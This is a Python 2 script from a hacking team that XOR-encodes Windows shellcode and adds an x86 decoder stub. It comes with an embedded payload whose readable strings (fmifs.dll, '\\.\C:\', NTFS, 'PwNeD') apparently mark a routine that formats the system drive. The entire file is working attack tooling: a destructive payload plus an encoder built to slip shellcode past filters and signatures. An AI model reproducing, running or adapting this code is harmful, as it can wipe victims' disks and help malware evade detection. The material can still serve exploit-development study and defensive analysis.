#!/usr/bin/env python # XOR Encoder With Decoder Stub # # Thanks to: Vivek Ramachandran (SecurityTube.NET) # Tweaked by: Ashfaq Ansari (HackSys Team) # # HackSys Team - Panthera # http://hacksys.vfreaks.com/ # hacksysteam@hotmail.com import sys # Paste the shellcode that you want to encode c_style_shellcode = ("\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50" "\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" "\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b" "\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" "\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20" "\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" "\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff" "\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" "\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00" "\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" "\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64" "\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" "\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46" "\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" "\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75" "\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" "\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff" "\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" "\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64" "\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" "\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00" "\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" "\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52" "\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" "\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff" "\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10" "\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50" "\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46" "\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00" "\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08" "\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8" "\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c" "\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00" "\x54\x00\x46\x00\x53\x00\x00\x00\x50\x00\x77" "\x00\x4e\x00\x65\x00\x44\x00\x00\x00\x55\x89" "\xe5\x31\xc0\x40\x5d\xc2\x0c\x00") shellcode = bytearray(c_style_shellcode) print 'Len of shellcode received: %d' %len(shellcode) # NULL byte counter null_count = 0 # Count no. of NULL bytes for item in shellcode : if item == 00 : null_count = null_count + 1 print 'Number of NULLs: %d' % null_count # Add NOPS if shellcode length is not a divisor of 4 if len(shellcode)%4 != 0 : shellcode += bytearray("\x90" *(4 - len(shellcode)%4)) print 'Len of shellcode after NOP addition: %d' %len(shellcode) xor_shellcode = bytearray('') # XOR key # Encode shellcode with this key # You may customize it as per your need xor = 0xaa # XOR encoding begings for item in shellcode : xor_shellcode.append(xor^item) # XOR encoding ends rev = '' # Reverse the shellcode for item in xor_shellcode[::-1] : rev += "\\x%02x" %item final_shellcode = '' # Adding Decoder Stub for item in map(''.join, zip(*[iter(rev)]*16)) : final_shellcode += "\\x68" + item[-4::] + item[-8:-4:] + item[-12:-8:] + item[-16:-12:] final_shellcode += "\\x89\\xe6\\x31\\xc9\\xb1" final_shellcode += "\\x%02x" % (len(shellcode)/4) final_shellcode += "\\xbb" + 4* ("\\x%02x" % xor) final_shellcode += "\\x31\\x1e\\x83\\xc6\\x04\\xe2\\xf9\\xff\\xe4" # Decoder stub added to final shellcode print 'Length of the encoded shellcode: %d\n' % (len(final_shellcode)/4) # Print the final XOR encoded shellcode print final_shellcode